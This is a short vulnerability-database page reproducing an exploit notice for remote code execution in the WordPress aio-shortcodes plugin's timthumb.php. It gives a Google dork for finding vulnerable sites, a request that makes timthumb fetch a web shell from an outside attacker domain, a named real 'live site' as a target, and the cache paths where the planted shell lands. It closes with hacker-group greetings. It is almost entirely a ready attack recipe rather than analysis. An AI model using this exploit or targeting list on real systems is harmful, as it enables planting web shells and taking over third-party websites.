WordPress aio-shortcodes Plugin - Remote Code Execution - CXSecurity.com

Vulnerability ID 1369533 Vulnerability type
Published 2018-10-26 Updated 2018-10-26
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2018100225
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability exploit
# Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution
# Google Dork: Index of /wp-content/plugins/aio-shortcodes
# Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
# Date: 26 October 2018
# Author: L4663r666h05t
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.x.x
# Screenshot: http://prntscr.com/lahts7
# Tested on: Windows 10 Pro (x64)

Versions Affected: 1.x.x

Live Site:
http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php
http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php

Your Shell:
http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php
http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php

Thanks to: T1KUS90T - ManadoGhost - Panjul Dot ID - Berandal - OWLSQUAD